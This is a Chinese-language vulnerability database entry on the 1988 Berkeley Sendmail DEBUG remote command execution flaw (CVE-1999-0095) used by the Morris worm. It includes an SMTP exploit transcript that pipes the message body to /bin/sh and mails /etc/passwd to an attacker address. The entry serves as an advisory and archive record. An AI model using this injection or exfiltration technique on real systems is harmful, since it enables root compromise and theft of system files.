Berkeley Sendmail 5.x DEBUG远程执行任意命令漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105232 漏洞类型 未知
发布时间 1988-08-01 更新时间 2005-05-02
CVE编号 CVE-1999-0095 CNNVD-ID CNNVD-198801-001
漏洞平台 Linux CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/19028
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-198801-001
|漏洞详情
Sendmail是一个广为使用的Internet邮件传输程序。早期版本的Sendmail程序有一个debug模式,允许在收件人处指定一个命令,此命令会以Sendmail进程的权限被执行(通常是root用户)。远程攻击者指定Sendmail进入debug模式后就可以以root用户的权限在主机上执行任意命令。此漏洞被著名的Morris蠕虫所利用。<*链接:http://www.cert.org/advisories/CA-1993-14.html*>
|漏洞EXP
220 mail.victim.com SMTP
helo attacker.com
250 Hello attacker.com, pleased to meet you.
debug
200 OK
mail from: </dev/null>
250 OK
rcpt to:<|sed -e '1,/^$/'d | /bin/sh ; exit 0">
250 OK
data
354 Start mail input; end with <CRLF>.<CRLF>
mail evil@attacker.com </etc/passwd
.
250 OK
quit
221 mail.victim.com Terminating

The sed in the receipient strips all mail headers from the
message before passing it on to the shell.
|参考资料

来源:BID
名称:1
链接:http://www.securityfocus.com/bid/1
来源:OSVDB
名称:195
链接:http://www.osvdb.org/195